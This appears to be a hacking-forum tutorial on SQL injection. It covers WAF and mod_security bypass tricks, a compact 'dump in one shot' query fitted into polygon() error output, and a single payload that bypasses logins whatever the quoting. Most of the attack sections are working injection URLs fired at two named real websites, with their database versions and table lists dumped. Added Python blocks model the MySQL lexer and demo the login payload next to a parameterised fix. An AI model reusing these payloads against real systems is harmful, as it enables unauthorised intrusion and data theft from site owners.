Recently I have been getting a lot of WAF bypass requests where the regular methods (/* , #\n , URL encoding etc.) don't work.
So today I will write about some new methods for handling these kinds of sites, plus some other new stuff.
This time there are no pictures in this paper, only text.
TOC
- waf bypass (\N , e , {})
- DIOS in non-geometric error based
- ABIOS (auth bypass in one shot)
waf bypass
Up to now, if we saw an error like "403 Forbidden", we didn't take it very seriously: we just used one of the known bypass methods and owned the website.
Recently, though, WAFs have been getting smarter and harder. But so have I.
We will use this site to demonstrate:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=78
I counted the columns using GROUP BY, and there are 16, so our query looks like this:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=-16 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
"Not Acceptable! This error was generated by Mod_Security."
So mod_security is on. How do we bypass it? Usually /*!50000union*/ and distinct do the trick:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=-16 /*!50000union*/ distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -
No more mod_security, but now we have another WAF.
That is the first trick I want to show you today.
As we can see, 'union' is being blocked, but how strictly? Let's do some tests:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16 union
403: union gets blocked. So maybe the 'e' trick will do?
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16e0union
403, still blocked. What if we glue a letter to it instead?
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=aunion
No 403: union is not blocked when a letter is stuck to it. But how can we stick a letter to union without getting a 1064 syntax error, given that aunion is just one identifier to MySQL?
We can do that with \N, MySQL's case-sensitive synonym for NULL (the N must be uppercase). The lexer takes \N as a complete token on its own, so \Nunion is read as NULL followed by union. Let's try:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Bypassed: column #10 shows on the screen. Let's try to get the version:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16--
403 again. Seems like we can't put version() directly in the column.
That is the second trick I want to show you.
Usually we would do something like (version()), but that seems to be covered here too.
MySQL has typed literals such as timestamp, where the keyword declares the type of the string that follows, like:
Code:
SELECT TIMESTAMP 'str';
The cool thing is that MySQL also accepts the ODBC escape form { identifier expr } for this: the value of the whole thing is simply expr, and the identifier is ignored, so the braces can be wrapped around any expression with any identifier in front:
Code:
SELECT { ts column};
So we can use that to hide version() from the WAF, like this:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,{f version()},11,12,13,14,15,16--
Boom: 5.5.40-36.1.
Another thing I want to talk about today is getting tables, so let's try:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from--
403: the WAF blocks from. Let's try sticking a number to it:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16from--
No WAF. Usually, to stick a number to from, we use the 'e' trick; it is forbidden here, but there is another method.
We can simply put a dot before the number and write the keyword right after it with no space: .16 is read as the decimal 0.16, and the lexer stops at the f that follows, so .16from is a number and then from.
So in our injection:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from sometable--
No WAF. Now, when we write "from information_schema.tables", we get the mod_security error.
Remember the brace trick? It also works around a table reference, so:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from {f information_schema.tables}--
mod_security: bypassed. 403: not yet.
As we can see, the combination "schema.tables" is what is blocked, and the usual tricks (backticks, +, parentheses) do not work, so we have to think outside the box.
We can mess with the lexer using 'e' again.
The query references tables in db.table.column form, and in MySQL "information_schema 0.e.tables" is read as information_schema.tables: the digit before the dot does not matter, because the lexer gives up on the incomplete number 0.e and hands the parser only the dot that follows it. So:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from {f information_schema 0.e.tables}--
Now for the table_name part. As before, we can't just write the column name in place of column #10, so we have to be creative.
Just like the information_schema bypass, we can use 'e' to mess with the lexer on the column as well.
For columns it goes like this: ``0.e.table_name = table_name, so:
Code:
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,``0.e.table_name,11,12,13,14,15,.16from {f information_schema 0.e.tables}--
Bypassed.
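To see what these tricks do at the lexer level, here is an added example in Python (not code from the original post): a small model of the MySQL lexer, limited to the token classes the tricks in this section depend on. The collapse of "0.e." into a single dot is modelled on the MySQL 5.x lexer behaviour the post exercises; the function names tokenize() and parser_view() are chosen here. Run it and it prints how each probe from this section is split before the parser ever sees it.

```python
import re

# Added example, not code from the original post. A small model of the MySQL
# lexer covering only the token classes the tricks above rely on. It shows why
# "\Nunion", "16e0union" and ".16from" split into two tokens, why "16from" is
# swallowed as one identifier (so the keyword never reaches the parser), and how
# "0.e." collapses into a lone "." so that "information_schema 0.e.tables"
# reaches the parser as information_schema.tables. /*!NNNNN ... */ version
# comments are lexed as SQL, as MySQL executes them; other comments are dropped.

IDENT_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$")
NUM = re.compile(r"\d+\.?\d*|\.\d+")   # 16, 16., 0.5, .16 (exponent handled below)


def _read_quoted(sql, i):
    """End index of the quoted token at sql[i]; doubled quotes and backslash
    escapes (outside backticks) stay inside it, as in MySQL."""
    q, j = sql[i], i + 1
    while j < len(sql):
        if sql[j] == "\\" and q != "`":
            j += 2
        elif sql[j] == q:
            if j + 1 < len(sql) and sql[j + 1] == q:
                j += 2
            else:
                return j + 1
        else:
            j += 1
    return len(sql)                       # unterminated: runs to the end


def tokenize(sql):
    """Return [(kind, text), ...] with kinds null, comment, string, ident,
    num, word, punct. Whitespace is skipped."""
    out, i, n = [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c.isspace():
            i += 1
        elif sql.startswith("\\N", i):                    # \N is the NULL literal
            out.append(("null", "\\N")); i += 2
        elif sql.startswith("/*!", i):                    # version comment: executed
            j = sql.find("*/", i + 3)
            j = n if j < 0 else j
            out.extend(tokenize(sql[i + 3:j].lstrip("0123456789")))
            i = min(j + 2, n)
        elif c == "#" or (sql.startswith("--", i) and (i + 2 == n or sql[i + 2] <= " ")):
            j = sql.find("\n", i)
            j = n if j < 0 else j
            out.append(("comment", sql[i:j])); i = j
        elif sql.startswith("/*", i):
            j = sql.find("*/", i + 2)
            j = n if j < 0 else j + 2
            out.append(("comment", sql[i:j])); i = j
        elif c in "'\"`":
            j = _read_quoted(sql, i)
            out.append(("ident" if c == "`" else "string", sql[i:j])); i = j
        elif c.isdigit() or (c == "." and i + 1 < n and sql[i + 1].isdigit()):
            m = NUM.match(sql, i)
            j, k = m.end(), m.end() + 1                  # k: index right after an 'e'
            if j < n and sql[j] in "eE":
                if k < n and sql[k] in "+-":
                    k += 1
                if k < n and sql[k].isdigit():              # 16e0: a real exponent
                    while k < n and sql[k].isdigit():
                        k += 1
                    out.append(("num", sql[i:k])); i = k
                    continue
                if "." in m.group() and k < n:              # 0.e X: only X survives
                    out.append(("punct", sql[k])); i = k + 1
                    continue
            if "." not in m.group() and j < n and sql[j] in IDENT_CHARS:
                while j < n and sql[j] in IDENT_CHARS:      # 16from: one identifier
                    j += 1
                out.append(("word", sql[i:j])); i = j
            else:
                out.append(("num", sql[i:j])); i = j       # .16from: number, then from
        elif c in IDENT_CHARS:
            j = i
            while j < n and sql[j] in IDENT_CHARS:
                j += 1
            out.append(("word", sql[i:j])); i = j
        else:
            out.append(("punct", c)); i += 1
    return out


def parser_view(sql):
    """What the SQL parser sees after the lexer: tokens joined, comments gone."""
    return " ".join(text for kind, text in tokenize(sql) if kind != "comment")


if __name__ == "__main__":
    for probe in ("16 union", "16e0union", "aunion", "16from", ".16from x",
                  "\\Nunion distinct select 1,{f version()}-- -",
                  "from {f information_schema 0.e.tables}"):
        print(f"{probe!r:50} -> {parser_view(probe)}")
```

The useful habit this gives you: before sending a glued-together payload, check which token the keyword lands in. If the WAF's regex wants a word boundary before union and MySQL's lexer does not, you have found the gap; if the glue turns union into part of an identifier (aunion, 16from), the database will reject it no matter what the WAF says.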
DIOS in non-geometric error based
Something I also saw recently is people trying to make DIOS (dump in one shot) work inside polygon().
The problem is that, unlike union, polygon's error output is limited in length, so we have to be cheap with space.
Even though it is limited, it is still longer than other error-based outputs.
The original DIOS query is this:
Code:
(select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x0a,table_name))))x)
P.S. I remember when denjacker showed me that 3 years ago; I was absolutely amazed to see how far people can get with only a simple variable.
Back to the tutorial. We will use this site to demonstrate:
Code:
http://www.thepernodship.co.uk/users/view.php?id=1
Let's check whether we can use polygon:
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)k)p))
Qusers - Error #1367: Illegal non geometric '(select `p`.`@@version` from (select '5.1.73-log' AS `@@version` from (select @@version AS `@@version`) `k`) `p`)' value found during parsing
Yes, we can. But as we can see, the output is very long and our DIOS will never fit in it.
The alias (`@@version`, repeated at every nesting level) is what takes most of the space, so let's save space by giving @@version a shorter alias, like 'a':
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version a)k)p))
Qusers - Error #1367: Illegal non geometric '(select `p`.`a` from (select '5.1.73-log' AS `a` from (select a AS `a`) `k`) `p`)' value found during parsing
Shorter indeed, but can we reduce it more? Let's give @@version an empty alias:
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version``)k)p))
Qusers - Error #1367: Illegal non geometric '(select `` from (select '5.1.73-log' AS `` from (select AS ``) `k`) `p`)' value found during parsing
That's more like it. Now let's put the DIOS syntax into our query:
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from((select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x0a,table_name))))x))k)p))
Qusers - Error #1367: Illegal non geometric '(select `p`.`(@)` from (select '' value found during parsing
Blank output: the 0x00 is converted to a real null byte, which cuts our output off right there.
Let's replace it with 0x01 (the 0x0a separator is also swapped for 0x203a20, which is " : "):
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from((select (@) from (select(@:=0x01),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x203a20,table_name))))x))k)p))
Qusers - Error #1367: Illegal non geometric '(select `p`.`(@)` from (select ' : blocklist : log_login : pernodmajorwinners : pernodmanagement : pernodmatches : pernodmessages : pernodnews : pernodpolls : pernodtopics : pernoduser' AS `(' value found during parsing
Let's get rid of the unnecessary parts and, as before, give our output an empty alias:
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select((select@''from(select@:=0x01,(select@ from information_schema.tables where table_schema!='information_schema'and@:=concat(@,0x203a20,table_name)))p))'')f)x))
Qusers - Error #1367: Illegal non geometric '(select `` from (select ' : blocklist : log_login : pernodmajorwinners : pernodmanagement : pernodmatches : pernodmessages : pernodnews : pernodpolls : pernodtopics : pernoduser' AS `` from (' value found during parsing
And we have DIOS for non-geometric error based.
Auth Bypass In One Shot
Sometimes we need to bypass an admin panel, and we do that with or 1=1.
The problem is that we don't know whether the field is compared as an integer, a single-quoted string or a double-quoted string.
But does it really matter? Let's look at this payload:
Code:
or 1-- -' or 1 or '1"or 1 or"
If the field is an integer, the query behind the page with our injection appended to the existing value 1 looks like this:
SELECT * FROM login WHERE id=1 or 1-- -' or 1 or '1"or 1 or" AND username='' AND password=''
The "or 1-- -" part is live: it makes the condition true, and the comment discards the rest of the query.
Now a regular single-quoted string:
SELECT * FROM login WHERE username=' or 1-- -' or 1 or '1"or 1 or" ' .....
Here the first and last parts of the payload land inside the comparison strings, and the "or 1" in the middle makes the condition true.
The same happens with double quotes, only now the single quotes are the ones trapped inside the strings:
SELECT * FROM login WHERE username=" or 1-- -' or 1 or '1"or 1 or" " .....
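Below is an added example in Python, not part of the original post, that runs the one-shot payload against the three query shapes above on an in-memory SQLite table with one constructed row, and puts the parameterised fix next to the vulnerable code. SQLite stands in for MySQL here (both treat "--" as a comment to end of line, a non-zero number as true and a doubled quote inside a string as an escaped quote). The leading "1" in the payload is taken from the post's integer example, since a bare "or" right after "id=" does not parse, and the trailing space keeps the double-quote shape from ending in "" (an escaped quote). The table, row and function names are chosen here.

```python
import sqlite3

# Added example, not code from the original post. It runs the one-shot payload
# against the three query shapes the post lists, using an in-memory SQLite table
# with one constructed row as the login table. SQLite stands in for MySQL here:
# both treat "--" as a comment to end of line, a non-zero number as true, and a
# doubled quote inside a string as an escaped quote. The leading "1" comes from
# the post's integer example (a bare "or" right after "id=" does not parse) and
# the trailing space keeps the double-quote shape from ending in "" (an escape).

PAYLOAD = "1 or 1-- -' or 1 or '1\"or 1 or\" "

# The three ways a careless login page might splice the input into its query.
SHAPES = {
    "integer": "SELECT id FROM login WHERE id={v} AND username='{u}' AND password='{p}'",
    "single": "SELECT id FROM login WHERE username='{v}' AND password='{p}'",
    "double": 'SELECT id FROM login WHERE username="{v}" AND password="{p}"',
}


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO login VALUES (1, 'admin', 'hunter2')")   # constructed row
    return con


def vulnerable_login(shape, value, password="x"):
    """String-concatenated query; True when at least one row comes back."""
    sql = SHAPES[shape].format(v=value, u="x", p=password)
    return _db().execute(sql).fetchone() is not None


def safe_login(username, password):
    """The fix: bound parameters, so the payload is compared as plain text."""
    sql = "SELECT id FROM login WHERE username=? AND password=?"
    return _db().execute(sql, (username, password)).fetchone() is not None


def bypass_report(payload=PAYLOAD):
    """Which shapes the payload gets through: all three for the one-shot payload."""
    return {shape: vulnerable_login(shape, payload) for shape in SHAPES}


if __name__ == "__main__":
    for shape, hit in bypass_report().items():
        print(f"{shape:8} {'bypassed' if hit else 'blocked'}")
    print(f"{'bound':8} {'bypassed' if safe_login(PAYLOAD, 'x') else 'blocked'}")
```

The same payload logs in through all three shapes and fails against the bound-parameter version, which is the only one of the four a login form should ever use.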
WAFs will always get trickier, the SQLi section will keep growing, and the human brain will keep delivering more with less.
That is my conclusion.
I hope you learned something.